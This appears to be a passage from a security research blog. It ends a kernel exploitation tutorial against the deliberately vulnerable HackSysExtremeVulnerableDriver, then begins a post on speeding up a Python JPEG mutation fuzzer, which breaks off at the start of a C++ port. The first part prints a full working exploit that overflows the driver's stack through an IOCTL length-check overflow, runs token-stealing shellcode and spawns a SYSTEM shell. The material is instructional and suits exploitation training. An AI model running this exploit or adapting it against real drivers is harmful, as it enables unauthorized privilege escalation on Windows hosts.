There can’t really be a problem with copying bytes from the user buffer into the kernel buffer unless somehow the copying exceeds the space allocated in the kernel buffer. If that occurs, we’ll begin overwriting adjacent memory with our user buffer. How can we fool this length + 0x4 check?

Manipulating DWORD nInBufferSize

First we’ll send a vanilla payload to test our theories up to this point. Let’s start by sending a buffer full of all \x41 chars and it will be a length of 0x750 (null-terminated). We’ll use the sizeof() - 1 method to form our nInBufferSize parameter and account for the null terminator as well so that everything is accurate and consistent. Our code will look like this at this point:

#include <iostream>
#include <string>
#include <iomanip>

#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x222027

HANDLE get_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver.\n";
        exit(1);
    }

    cout << "[>] Handle to HackSysExtremeVulnerableDriver: " << hex << hFile
        << "\n";

    return hFile;
}

void send_payload(HANDLE hFile) {

    

    BYTE input_buff[0x751] = { 0 };

    // 'A' * 0x750 (1872)
    memset(
        input_buff,
        '\x41',
        0x750);

    cout << "[>] Sending buffer of size: " << sizeof(input_buff) - 1  << "\n";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        &input_buff,
        sizeof(input_buff) - 1,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {
        cout << "[!] Payload failed.\n";
    }
}

int main()
{
    HANDLE hFile = get_handle();

    send_payload(hFile);
}

What are our predictions for this code? What conditions will we hit? The criteria for copying bytes from user buffer to kernel buffer was:

  1. the length of our buffer + 4 is < 0x800,
  2. the Counter variable (edi) is < the length of our buffer divided by 4,
  3. and the 4 byte value in eax is not 0BAD0B0B0

We should pass the first check since our buffer is indeed small enough. This second check will eventually make us exit the function since our length divided by 4, will eventually be caught by the Counter as it increments every 4 byte copy. We don’t have to worry about the third check as we don’t have this string in our payload. Let’s send it and step through it in WinDBG.

This picture helps us a lot. I’ve set a breakpoint on the comparison between the length of our buffer + 4 and 0x800. As you can see, eax holds 0x754 which is what we would expect since we sent a 0x750 byte buffer.

In the bottom right, we see our user buffer was allocated at 0x0012f184. Let’s set a break on access at 0x0012f8d0 since that is 0x74c away from where we are now, which is 0x4 short of 0x750. If this 4 byte address is accessed for a read operation we should hit our breakpoint. This will occur when the program goes to copy the 4 byte value here to the kernel buffer.

The syntax is ba r1 0x0012f8d0 which means “break on access if there is a read of at least 1 byte at that address.”

We resume from here and hit our breakpoint.

Take a look at edi: we can see our counter has incremented 0x1d3 times at this point, which is very close to the length of our buffer (0x750) divided by 0x4 (0x1d4). We can see that right now we’re comparing the 4 byte value at this address to ecx, or bad0b0b0. We won’t hit that criterion, but on the next iteration our counter will be equal to 0x1d4 and thus we will be finished copying bytes into the kernel buffer. Everything worked as expected. Now let’s send a fake DWORD nInBufferSize value of 0xFFFFFFFF, watch us sail right through the length check, and see what else we bypass.

Our DeviceIoControl call now looks like this:

int result = DeviceIoControl(hFile,
        IOCTL,
        &input_buff,
        ULONG_MAX,
        NULL,
        0,
        &bytes_ret,
        NULL);

When we hit a breakpoint at the point where we see eax being loaded with our user buffer length + 0x4, we see that right before the arithmetic, we are at a length of 0xffffffff in ebx.

Then after the operation, we see eax rolls over to 0x3.

So we will now pass the length check for sure, which we saw coming. The other really interesting thing, which we took note of previously but can see playing out here, is that ebx has been left undisturbed and still holds 0xffffffff. This is the register used in the arithmetic that determines whether or not the Counter should keep iterating, and it is eventually loaded into eax and divided by 4! 0xffffffff divided by 4 will likely never cause us to exit the function. We will keep copying bytes from the user buffer to the kernel buffer basically forever now.

THIS IS NOT GOOD

Overwriting arbitrary memory in kernel space is dangerous business; we can’t corrupt anything more than we absolutely have to, and if the copying never stops we obviously BSOD. We need a way to terminate the copying function. In comes the terminator string of 0BAD0B0B0 to the rescue: if the 4 byte value in the user buffer is 0BAD0B0B0, we cease copying and exit the function.

So hopefully, we can copy 0x800 bytes, and then start overwriting kernel memory on the stack where we can strategically place a pointer to shellcode. Like I said previously, you don’t want a huge overwrite here. I started at 0x800 and worked my way up 4 bytes at a time using a little pattern creating tool I made here until I got a crash.

Incrementing 4 bytes at a time I finally got a crash with a 0x830 buffer length where the last 4 bytes are 0BAD0B0B0.

Getting a Crash

After incrementing methodically from a buffer size of 0x800, and remember that this includes a 4 byte terminator string or else we’ll never stop copying into kernel space and BSOD the host, I finally got an exception that tried to execute code at 41414141 with a total buffer size of 0x830. (I also got an exception when I used a smaller buffer size of 0x82C but the address referenced was a NULL). In this buffer, I had 0x82C \x41 chars and then our terminator. So I figured our offset was going to be at 0x828 or 2088 in decimal, but just to make sure I used my pattern python script to get the exact offset.

root@kali:~# python3 pattern.py -c 2092 -cpp
char pattern[] = 
"0Aa0Ab0Ac0Ad0Ae0Af0Ag0Ah0Ai0Aj0Ak0Al0Am0An0Ao0Ap0Aq0Ar0As0At0Au0Av0Aw0Ax0Ay0Az"
"0A00A10A20A30A40A50A60A70A80A90AA0AB0AC0AD0AE0AF0AG0AH0AI0AJ0AK0AL0AM0AN0AO0AP"
"0AQ0AR0AS0AT0AU0AV0AW0AX0AY0AZ0Ba0Bb0Bc0Bd0Be0Bf0Bg0Bh0Bi0Bj0Bk0Bl0Bm0Bn0Bo0Bp"
"0Bq0Br0Bs0Bt0Bu0Bv0Bw0Bx0By0Bz0B00B10B20B30B40B50B60B70B80B90BA0BB0BC0BD0BE0BF"
"0BG0BH0BI0BJ0BK0BL0BM0BN0BO0BP0BQ0BR0BS0BT0BU0BV0BW0BX0BY0BZ0Ca0Cb0Cc0Cd0Ce0Cf"
"0Cg0Ch0Ci0Cj0Ck0Cl0Cm0Cn0Co0Cp0Cq0Cr0Cs0Ct0Cu0Cv0Cw0Cx0Cy0Cz0C00C10C20C30C40C5"
"0C60C70C80C90CA0CB0CC0CD0CE0CF0CG0CH0CI0CJ0CK0CL0CM0CN0CO0CP0CQ0CR0CS0CT0CU0CV"
"0CW0CX0CY0CZ0Da0Db0Dc0Dd0De0Df0Dg0Dh0Di0Dj0Dk0Dl0Dm0Dn0Do0Dp0Dq0Dr0Ds0Dt0Du0Dv"
"0Dw0Dx0Dy0Dz0D00D10D20D30D40D50D60D70D80D90DA0DB0DC0DD0DE0DF0DG0DH0DI0DJ0DK0DL"
"0DM0DN0DO0DP0DQ0DR0DS0DT0DU0DV0DW0DX0DY0DZ0Ea0Eb0Ec0Ed0Ee0Ef0Eg0Eh0Ei0Ej0Ek0El"
"0Em0En0Eo0Ep0Eq0Er0Es0Et0Eu0Ev0Ew0Ex0Ey0Ez0E00E10E20E30E40E50E60E70E80E90EA0EB"
"0EC0ED0EE0EF0EG0EH0EI0EJ0EK0EL0EM0EN0EO0EP0EQ0ER0ES0ET0EU0EV0EW0EX0EY0EZ0Fa0Fb"
"0Fc0Fd0Fe0Ff0Fg0Fh0Fi0Fj0Fk0Fl0Fm0Fn0Fo0Fp0Fq0Fr0Fs0Ft0Fu0Fv0Fw0Fx0Fy0Fz0F00F1"
"0F20F30F40F50F60F70F80F90FA0FB0FC0FD0FE0FF0FG0FH0FI0FJ0FK0FL0FM0FN0FO0FP0FQ0FR"
"0FS0FT0FU0FV0FW0FX0FY0FZ0Ga0Gb0Gc0Gd0Ge0Gf0Gg0Gh0Gi0Gj0Gk0Gl0Gm0Gn0Go0Gp0Gq0Gr"
"0Gs0Gt0Gu0Gv0Gw0Gx0Gy0Gz0G00G10G20G30G40G50G60G70G80G90GA0GB0GC0GD0GE0GF0GG0GH"
"0GI0GJ0GK0GL0GM0GN0GO0GP0GQ0GR0GS0GT0GU0GV0GW0GX0GY0GZ0Ha0Hb0Hc0Hd0He0Hf0Hg0Hh"
"0Hi0Hj0Hk0Hl0Hm0Hn0Ho0Hp0Hq0Hr0Hs0Ht0Hu0Hv0Hw0Hx0Hy0Hz0H00H10H20H30H40H50H60H7"
"0H80H90HA0HB0HC0HD0HE0HF0HG0HH0HI0HJ0HK0HL0HM0HN0HO0HP0HQ0HR0HS0HT0HU0HV0HW0HX"
"0HY0HZ0Ia0Ib0Ic0Id0Ie0If0Ig0Ih0Ii0Ij0Ik0Il0Im0In0Io0Ip0Iq0Ir0Is0It0Iu0Iv0Iw0Ix"
"0Iy0Iz0I00I10I20I30I40I50I60I70I80I90IA0IB0IC0ID0IE0IF0IG0IH0II0IJ0IK0IL0IM0IN"
"0IO0IP0IQ0IR0IS0IT0IU0IV0IW0IX0IY0IZ0Ja0Jb0Jc0Jd0Je0Jf0Jg0Jh0Ji0Jj0Jk0Jl0Jm0Jn"
"0Jo0Jp0Jq0Jr0Js0Jt0Ju0Jv0Jw0Jx0Jy0Jz0J00J10J20J30J40J50J60J70J80J90JA0JB0JC0JD"
"0JE0JF0JG0JH0JI0JJ0JK0JL0JM0JN0JO0JP0JQ0JR0JS0JT0JU0JV0JW0JX0JY0JZ0Ka0Kb0Kc0Kd"
"0Ke0Kf0Kg0Kh0Ki0Kj0Kk0Kl0Km0Kn0Ko0Kp0Kq0Kr0Ks0Kt0Ku0Kv0Kw0Kx0Ky0Kz0K00K10K20K3"
"0K40K50K60K70K80K90KA0KB0KC0KD0KE0KF0KG0KH0KI0KJ0KK0KL0KM0KN0KO0KP0KQ0KR0KS0KT"
"0KU0KV0KW0KX0KY0KZ0La0Lb0Lc0Ld0Le0Lf0Lg0Lh0Li0Lj0Lk0Ll0Lm0Ln0Lo0";

I then added the terminator to the end like so.

---SNIP---
...Lm0Ln0Lo0\xb0\xb0\xd0\xba";

And we see I got an access violation at 306f4c30.

Using pattern again, I got the exact offset and we confirmed our suspicions.

root@kali:~# python3 pattern.py -o 306f4c30
Exact offset found at position: 2088

From here on out, this plays out just like the stack buffer overflow posts, so please reference those if you have any questions! We initialize our shellcode, create a RWX buffer for it, move it there, and then use the address of the buffer to overwrite eip at the offset we found.

Final Code

#include <iostream>
#include <string>
#include <iomanip>

#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x222027

HANDLE get_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver.\n";
        exit(1);
    }

    cout << "[>] Handle to HackSysExtremeVulnerableDriver: " << hex << hFile
        << "\n";

    return hFile;
}

void send_payload(HANDLE hFile) {

    char shellcode[] = (
        "\x60"
        "\x64\xA1\x24\x01\x00\x00"
        "\x8B\x40\x50"
        "\x89\xC1"
        "\x8B\x98\xF8\x00\x00\x00"
        "\xBA\x04\x00\x00\x00"
        "\x8B\x80\xB8\x00\x00\x00"
        "\x2D\xB8\x00\x00\x00"
        "\x39\x90\xB4\x00\x00\x00"
        "\x75\xED"
        "\x8B\x90\xF8\x00\x00\x00"
        "\x89\x91\xF8\x00\x00\x00"
        "\x61"
        "\x5d"
        "\xc2\x08\x00"
        );

    LPVOID shellcode_address = VirtualAlloc(NULL,
        sizeof(shellcode),
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memcpy(shellcode_address, shellcode, sizeof(shellcode));

    cout << "[>] RWX shellcode allocated at: " << hex << shellcode_address
        << "\n";

    BYTE input_buff[0x830] = { 0 };

    // 'A' * 0x828
    memset(input_buff, '\x41', 0x828);

    memcpy(input_buff + 0x828, &shellcode_address, 0x4);

    BYTE terminator[] = "\xb0\xb0\xd0\xba";

    memcpy(input_buff + 0x82c, &terminator, 0x4);

    cout << "[>] Sending buffer of size: " << sizeof(input_buff) << "\n";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        &input_buff,
        ULONG_MAX,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {
        cout << "[!] Payload failed.\n";
    }
}

void spawn_shell()
{
    PROCESS_INFORMATION Process_Info;
    ZeroMemory(&Process_Info, 
        sizeof(Process_Info));
    
    STARTUPINFOA Startup_Info;
    ZeroMemory(&Startup_Info, 
        sizeof(Startup_Info));
    
    Startup_Info.cb = sizeof(Startup_Info);

    CreateProcessA("C:\\Windows\\System32\\cmd.exe",
        NULL, 
        NULL, 
        NULL, 
        0, 
        CREATE_NEW_CONSOLE, 
        NULL, 
        NULL, 
        &Startup_Info, 
        &Process_Info);
}

int main()
{
    HANDLE hFile = get_handle();

    send_payload(hFile);

    spawn_shell();
}

Conclusion

This should net you a system shell.

Fuzzing Like A Caveman 2: Improving Performance

By: h0mbre
8 April 2020 at 04:00

Introduction

In this episode of ‘Fuzzing like a Caveman’ we’ll just be looking at improving the performance of our previous fuzzer. This means there won’t be any wholesale changes, we’re simply looking to improve upon what we already had in the previous post. This means we’ll still end up walking away from this blogpost with a very basic mutation fuzzer (please let it be faster!!) and hopefully some more bugs on a different target. We won’t really tinker with multi-threading or multi-processing in this post, we will save that for subsequent fuzzing posts.

I feel the need to add a DISCLAIMER here that I am not a professional developer, far from it. I’m simply not experienced enough with programming at this point to recognize opportunities to improve performance the way a more seasoned programmer would. I’m going to use my crude skillset and my limited knowledge of programming to improve our previous fuzzer, that’s it. The code produced will not be pretty, it will not be perfect, but it will be better than what we had in the previous post. It should also be mentioned that all testing was done on VMWare Workstation on an x86 Kali VM with 1 CPU and 1 Core.

Let’s take a moment to define ‘better’ in the context of this blog post as well. What I mean by ‘better’ here is that we can iterate through n fuzzing iterations faster, that’s it. We’ll take the time to completely rewrite the fuzzer, use a cool language, pick a hardened target, and employ more advanced fuzzing techniques at a later date. :)

Obviously, if you haven’t read the previous post you will be LOST!

Analyzing Our Fuzzer

Our last fuzzer, quite plainly, worked! We found some bugs in our target. But we knew we left some optimizations on the table when we turned in our homework. Let’s again look at the fuzzer from the last post (with minor changes for testing purposes):

#!/usr/bin/env python3

import sys
import random
from pexpect import run
from pipes import quote

# read bytes from our valid JPEG and return them in a mutable bytearray 
def get_bytes(filename):

	f = open(filename, "rb").read()

	return bytearray(f)

def bit_flip(data):

	num_of_flips = int((len(data) - 4) * .01)

	indexes = range(4, (len(data) - 4))

	chosen_indexes = []

	# iterate selecting indexes until we've hit our num_of_flips number
	counter = 0
	while counter < num_of_flips:
		chosen_indexes.append(random.choice(indexes))
		counter += 1

	for x in chosen_indexes:
		current = data[x]
		current = (bin(current).replace("0b",""))
		current = "0" * (8 - len(current)) + current
		
		indexes = range(0,8)

		picked_index = random.choice(indexes)

		new_number = []

		# our new_number list now has all the digits, example: ['1', '0', '1', '0', '1', '0', '1', '0']
		for i in current:
			new_number.append(i)

		# if the number at our randomly selected index is a 1, make it a 0, and vice versa
		if new_number[picked_index] == "1":
			new_number[picked_index] = "0"
		else:
			new_number[picked_index] = "1"

		# create our new binary string of our bit-flipped number
		current = ''
		for i in new_number:
			current += i

		# convert that string to an integer
		current = int(current,2)

		# change the number in our byte array to our new number we just constructed
		data[x] = current

	return data

def magic(data):

	magic_vals = [
	(1, 255),
	(1, 255),
	(1, 127),
	(1, 0),
	(2, 255),
	(2, 0),
	(4, 255),
	(4, 0),
	(4, 128),
	(4, 64),
	(4, 127)
	]

	picked_magic = random.choice(magic_vals)

	length = len(data) - 8
	index = range(0, length)
	picked_index = random.choice(index)

	# here we are hardcoding all the byte overwrites for all of the tuples that begin (1, )
	if picked_magic[0] == 1:
		if picked_magic[1] == 255:			# 0xFF
			data[picked_index] = 255
		elif picked_magic[1] == 127:		# 0x7F
			data[picked_index] = 127
		elif picked_magic[1] == 0:			# 0x00
			data[picked_index] = 0

	# here we are hardcoding all the byte overwrites for all of the tuples that begin (2, )
	elif picked_magic[0] == 2:
		if picked_magic[1] == 255:			# 0xFFFF
			data[picked_index] = 255
			data[picked_index + 1] = 255
		elif picked_magic[1] == 0:			# 0x0000
			data[picked_index] = 0
			data[picked_index + 1] = 0

	# here we are hardcoding all of the byte overwrites for all of the tuples that begin (4, )
	elif picked_magic[0] == 4:
		if picked_magic[1] == 255:			# 0xFFFFFFFF
			data[picked_index] = 255
			data[picked_index + 1] = 255
			data[picked_index + 2] = 255
			data[picked_index + 3] = 255
		elif picked_magic[1] == 0:			# 0x00000000
			data[picked_index] = 0
			data[picked_index + 1] = 0
			data[picked_index + 2] = 0
			data[picked_index + 3] = 0
		elif picked_magic[1] == 128:		# 0x80000000
			data[picked_index] = 128
			data[picked_index + 1] = 0
			data[picked_index + 2] = 0
			data[picked_index + 3] = 0
		elif picked_magic[1] == 64:			# 0x40000000
			data[picked_index] = 64
			data[picked_index + 1] = 0
			data[picked_index + 2] = 0
			data[picked_index + 3] = 0
		elif picked_magic[1] == 127:		# 0x7FFFFFFF
			data[picked_index] = 127
			data[picked_index + 1] = 255
			data[picked_index + 2] = 255
			data[picked_index + 3] = 255
		
	return data

# create new jpg with mutated data
def create_new(data):

	f = open("mutated.jpg", "wb+")
	f.write(data)
	f.close()

def exif(counter,data):

    command = "exif mutated.jpg -verbose"

    out, returncode = run("sh -c " + quote(command), withexitstatus=1)

    if b"Segmentation" in out:
    	f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
    	f.write(data)
    	print("Segfault!")

    #if counter % 100 == 0:
    #	print(counter, end="\r")

if len(sys.argv) < 2:
	print("Usage: JPEGfuzz.py <valid_jpg>")

else:
	filename = sys.argv[1]
	counter = 0
	while counter < 1000:
		data = get_bytes(filename)
		functions = [0, 1]
		picked_function = random.choice(functions)
		picked_function = 1
		if picked_function == 0:
			mutated = magic(data)
			create_new(mutated)
			exif(counter,mutated)
		else:
			mutated = bit_flip(data)
			create_new(mutated)
			exif(counter,mutated)

		counter += 1

You may notice a few changes. We’ve:

  • commented out the print statement for the iterations counter every 100 iterations,
  • added print statements to notify us of any Segfaults,
  • hardcoded 1k iterations,
  • added this line: picked_function = 1 temporarily so that we eliminate any randomness in our testing and we only stick to one mutation method (bit_flip())

Let’s run this version of our fuzzer with some profiling instrumentation and we can really analyze how much time we spend where in our program’s execution.

We can make use of the cProfile Python module and see where we spend our time during 1,000 fuzzing iterations. The program takes a filepath argument to a valid JPEG file if you remember, so our complete command line syntax will be: python3 -m cProfile -s cumtime JPEGfuzzer.py ~/jpegs/Canon_40D.jpg.

It should also be noted that adding this cProfile instrumentation could slow down performance. I tested without it and for the iteration sizes we use in this post, it didn’t seem to make a significant difference.

After letting this run, we see our program output and we get to see where we spent the most time during execution.

2476093 function calls (2474812 primitive calls) in 122.084 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     33/1    0.000    0.000  122.084  122.084 {built-in method builtins.exec}
        1    0.108    0.108  122.084  122.084 blog.py:3(<module>)
     1000    0.090    0.000  118.622    0.119 blog.py:140(exif)
     1000    0.080    0.000  118.452    0.118 run.py:7(run)
     5432  103.761    0.019  103.761    0.019 {built-in method time.sleep}
     1000    0.028    0.000  100.923    0.101 pty_spawn.py:316(close)
     1000    0.025    0.000  100.816    0.101 ptyprocess.py:387(close)
     1000    0.061    0.000    9.949    0.010 pty_spawn.py:36(__init__)
     1000    0.074    0.000    9.764    0.010 pty_spawn.py:239(_spawn)
     1000    0.041    0.000    8.682    0.009 pty_spawn.py:312(_spawnpty)
     1000    0.266    0.000    8.641    0.009 ptyprocess.py:178(spawn)
     1000    0.011    0.000    7.491    0.007 spawnbase.py:240(expect)
     1000    0.036    0.000    7.479    0.007 spawnbase.py:343(expect_list)
     1000    0.128    0.000    7.409    0.007 expect.py:91(expect_loop)
     6432    6.473    0.001    6.473    0.001 {built-in method posix.read}
     5432    0.089    0.000    3.818    0.001 pty_spawn.py:415(read_nonblocking)
     7348    0.029    0.000    3.162    0.000 utils.py:130(select_ignore_interrupts)
     7348    3.127    0.000    3.127    0.000 {built-in method select.select}
     1000    0.790    0.001    1.777    0.002 blog.py:15(bit_flip)
     1000    0.015    0.000    1.311    0.001 blog.py:134(create_new)
     1000    0.100    0.000    1.101    0.001 pty.py:79(fork)
     1000    1.000    0.001    1.000    0.001 {built-in method posix.forkpty}
-----SNIP-----

For this type of analysis, we don’t really care about how many segfaults we had since we’re not really tinkering much with the mutation methods or comparing different methods. Granted there will be some randomness here, as a crash would necessitate extra processing, but this will do for now.

I snipped only the sections of code where we spent more than 1.0 seconds cumulatively. You can see we spent by far the most time in blog.py:140(exif). A whopping 118 seconds out of 122 seconds total. Our exif() function seems to be a major problem in our performance.

We can see that most of the time spent underneath that function was directly related to our pexpect usage; we see plenty of calls into the pty module. Let’s rewrite our function using Popen from the subprocess module and see if we can improve performance here!

Here is our redefined exif() function:

def exif(counter,data):

    # Popen and PIPE come from the subprocess module: from subprocess import Popen, PIPE
    p = Popen(["exif", "mutated.jpg", "-verbose"], stdout=PIPE, stderr=PIPE)
    (out,err) = p.communicate()

    if p.returncode == -11:
    	f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
    	f.write(data)
    	print("Segfault!")

    #if counter % 100 == 0:
    #	print(counter, end="\r")

Here is our performance report:

2065580 function calls (2065443 primitive calls) in 2.756 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000    2.756    2.756 {built-in method builtins.exec}
        1    0.038    0.038    2.756    2.756 subpro.py:3(<module>)
     1000    0.020    0.000    1.917    0.002 subpro.py:139(exif)
     1000    0.026    0.000    1.121    0.001 subprocess.py:681(__init__)
     1000    0.099    0.000    1.045    0.001 subprocess.py:1412(_execute_child)
 -----SNIP-----

What a difference. This fuzzer, with the redefined exif() function performed the same amount of work in only 2 seconds!! That’s insane! The old fuzzer: 122 seconds, new fuzzer: 2.7 seconds.

Improving Further in Python

Let’s try to continue improving our fuzzer all within Python. First, let’s get a good benchmark for us to perform against. We’ll get our optimized Python fuzzer to iterate through 50,000 fuzzing iterations and we’ll use the cProfile module again to get some fine-grained statistics about where we spend our time.

102981395 function calls (102981258 primitive calls) in 141.488 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000  141.488  141.488 {built-in method builtins.exec}
        1    1.724    1.724  141.488  141.488 subpro.py:3(<module>)
    50000    0.992    0.000  102.588    0.002 subpro.py:139(exif)
    50000    1.248    0.000   61.562    0.001 subprocess.py:681(__init__)
    50000    5.034    0.000   57.826    0.001 subprocess.py:1412(_execute_child)
    50000    0.437    0.000   39.586    0.001 subprocess.py:920(communicate)
    50000    2.527    0.000   39.064    0.001 subprocess.py:1662(_communicate)
   208254   37.508    0.000   37.508    0.000 {built-in method posix.read}
   158238    0.577    0.000   28.809    0.000 selectors.py:402(select)
   158238   28.131    0.000   28.131    0.000 {method 'poll' of 'select.poll' objects}
    50000   11.784    0.000   25.819    0.001 subpro.py:14(bit_flip)
  7950000    3.666    0.000   10.431    0.000 random.py:256(choice)
    50000    8.421    0.000    8.421    0.000 {built-in method _posixsubprocess.fork_exec}
    50000    0.162    0.000    7.358    0.000 subpro.py:133(create_new)
  7950000    4.096    0.000    6.130    0.000 random.py:224(_randbelow)
   203090    5.016    0.000    5.016    0.000 {built-in method io.open}
    50000    4.211    0.000    4.211    0.000 {method 'close' of '_io.BufferedRandom' objects}
    50000    1.643    0.000    4.194    0.000 os.py:617(get_exec_path)
    50000    1.733    0.000    3.356    0.000 subpro.py:8(get_bytes)
 35866791    2.635    0.000    2.635    0.000 {method 'append' of 'list' objects}
   100000    0.070    0.000    1.960    0.000 subprocess.py:1014(wait)
   100000    0.252    0.000    1.902    0.000 selectors.py:351(register)
   100000    0.444    0.000    1.890    0.000 subprocess.py:1621(_wait)
   100000    0.675    0.000    1.583    0.000 selectors.py:234(register)
   350000    0.432    0.000    1.501    0.000 subprocess.py:1471(<genexpr>)
 12074141    1.434    0.000    1.434    0.000 {method 'getrandbits' of '_random.Random' objects}
    50000    0.059    0.000    1.358    0.000 subprocess.py:1608(_try_wait)
    50000    1.299    0.000    1.299    0.000 {built-in method posix.waitpid}
   100000    0.488    0.000    1.058    0.000 os.py:674(__getitem__)
   100000    1.017    0.000    1.017    0.000 {method 'close' of '_io.BufferedReader' objects}
-----SNIP-----

50,000 iterations took us a grand total of 141 seconds; this is great performance compared to what we were dealing with. We previously took 122 seconds to do just 1,000 iterations! Once again filtering on only the places where we spent over 1.0 seconds cumulatively, we see that we again spent most of our time in exif(), but we also see some performance issues in bit_flip() as we spent 25 cumulative seconds there. Let’s try to optimize that function a bit.

Let’s go ahead and repost what the old bit_flip() function looked like:

def bit_flip(data):

	num_of_flips = int((len(data) - 4) * .01)

	indexes = range(4, (len(data) - 4))

	chosen_indexes = []

	# iterate selecting indexes until we've hit our num_of_flips number
	counter = 0
	while counter < num_of_flips:
		chosen_indexes.append(random.choice(indexes))
		counter += 1

	for x in chosen_indexes:
		current = data[x]
		current = (bin(current).replace("0b",""))
		current = "0" * (8 - len(current)) + current
		
		indexes = range(0,8)

		picked_index = random.choice(indexes)

		new_number = []

		# our new_number list now has all the digits, example: ['1', '0', '1', '0', '1', '0', '1', '0']
		for i in current:
			new_number.append(i)

		# if the number at our randomly selected index is a 1, make it a 0, and vice versa
		if new_number[picked_index] == "1":
			new_number[picked_index] = "0"
		else:
			new_number[picked_index] = "1"

		# create our new binary string of our bit-flipped number
		current = ''
		for i in new_number:
			current += i

		# convert that string to an integer
		current = int(current,2)

		# change the number in our byte array to our new number we just constructed
		data[x] = current

	return data

This function is admittedly a bit clumsy. We can simplify it greatly by utilizing better logic. I find this is often the case with programming in my limited experience: you can have all of the fancy esoteric programming knowledge you want, but if the logic behind your program is unsound, then the program’s performance will suffer.

Let’s reduce the number of type conversions we do (for instance, int to str or vice versa) and just get less code into our editor. We can accomplish what we want with a re-defined bit_flip() function as follows:

def bit_flip(data):

	length = len(data) - 4

	num_of_flips = int(length * .01)

	picked_indexes = []
	
	flip_array = [1,2,4,8,16,32,64,128]

	counter = 0
	while counter < num_of_flips:
		picked_indexes.append(random.choice(range(0,length)))
		counter += 1


	for x in picked_indexes:
		mask = random.choice(flip_array)
		data[x] = data[x] ^ mask

	return data

If we employ this new function and monitor the results, we get a performance grade of:

59376275 function calls (59376138 primitive calls) in 135.582 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000  135.582  135.582 {built-in method builtins.exec}
        1    1.940    1.940  135.582  135.582 subpro.py:3(<module>)
    50000    0.978    0.000  107.857    0.002 subpro.py:111(exif)
    50000    1.450    0.000   64.236    0.001 subprocess.py:681(__init__)
    50000    5.566    0.000   60.141    0.001 subprocess.py:1412(_execute_child)
    50000    0.534    0.000   42.259    0.001 subprocess.py:920(communicate)
    50000    2.827    0.000   41.637    0.001 subprocess.py:1662(_communicate)
   199549   38.249    0.000   38.249    0.000 {built-in method posix.read}
   149537    0.555    0.000   30.376    0.000 selectors.py:402(select)
   149537   29.722    0.000   29.722    0.000 {method 'poll' of 'select.poll' objects}
    50000    3.993    0.000   14.471    0.000 subpro.py:14(bit_flip)
  7950000    3.741    0.000   10.316    0.000 random.py:256(choice)
    50000    9.973    0.000    9.973    0.000 {built-in method _posixsubprocess.fork_exec}
    50000    0.163    0.000    7.034    0.000 subpro.py:105(create_new)
  7950000    3.987    0.000    5.952    0.000 random.py:224(_randbelow)
   202567    4.966    0.000    4.966    0.000 {built-in method io.open}
    50000    4.042    0.000    4.042    0.000 {method 'close' of '_io.BufferedRandom' objects}
    50000    1.539    0.000    3.828    0.000 os.py:617(get_exec_path)
    50000    1.843    0.000    3.607    0.000 subpro.py:8(get_bytes)
   100000    0.074    0.000    2.133    0.000 subprocess.py:1014(wait)
   100000    0.463    0.000    2.059    0.000 subprocess.py:1621(_wait)
   100000    0.274    0.000    2.046    0.000 selectors.py:351(register)
   100000    0.782    0.000    1.702    0.000 selectors.py:234(register)
    50000    0.055    0.000    1.507    0.000 subprocess.py:1608(_try_wait)
    50000    1.452    0.000    1.452    0.000 {built-in method posix.waitpid}
   350000    0.424    0.000    1.436    0.000 subprocess.py:1471(<genexpr>)
 12066317    1.339    0.000    1.339    0.000 {method 'getrandbits' of '_random.Random' objects}
   100000    0.466    0.000    1.048    0.000 os.py:674(__getitem__)
   100000    1.014    0.000    1.014    0.000 {method 'close' of '_io.BufferedReader' objects}
-----SNIP-----

As you can see from the metrics, we only spend 14 cumulative seconds in bit_flip() at this point! In our last go-round we spent 25 seconds here, so this is almost twice as fast. We’re doing a good job of optimizing here, in my opinion.

Now that we have our ideal Python benchmark (keep in mind there might be opportunities for multi-processing or multi-threading but let’s save this idea for another time), let’s go ahead and port our fuzzer to a new language, C++ and test the performance.

New Fuzzer in C++

To get started, let’s just go ahead and flat out run our newly optimized python fuzzer through 100,000 fuzzing iterations and see how long in total it takes.

118749892 function calls (118749755 primitive calls) in 256.881 seconds

100k iterations in only 256 seconds! That destroys our previous fuzzer.

That will be our benchmark we try to beat in C++. Now, as unfamiliar as I am with the nuances of Python development, multiply that by 10 and you’ll have my unfamiliarity with C++. This code might be laughable to some, but it’s the best I could manage at the present moment and we can explain each function as it relates to our previous Python code.

Let’s go through, function by function, and describe their implementation.

//
// this function simply creates a stream by opening a file in binary mode;
// finds the end of the file; creates a string 'data'; resizes 'data' to be the same
// size as the file; moves the file pointer back to the beginning of the file;
// reads the data from the file into the 'data' string;
//
std::string get_bytes(std::string filename)
{
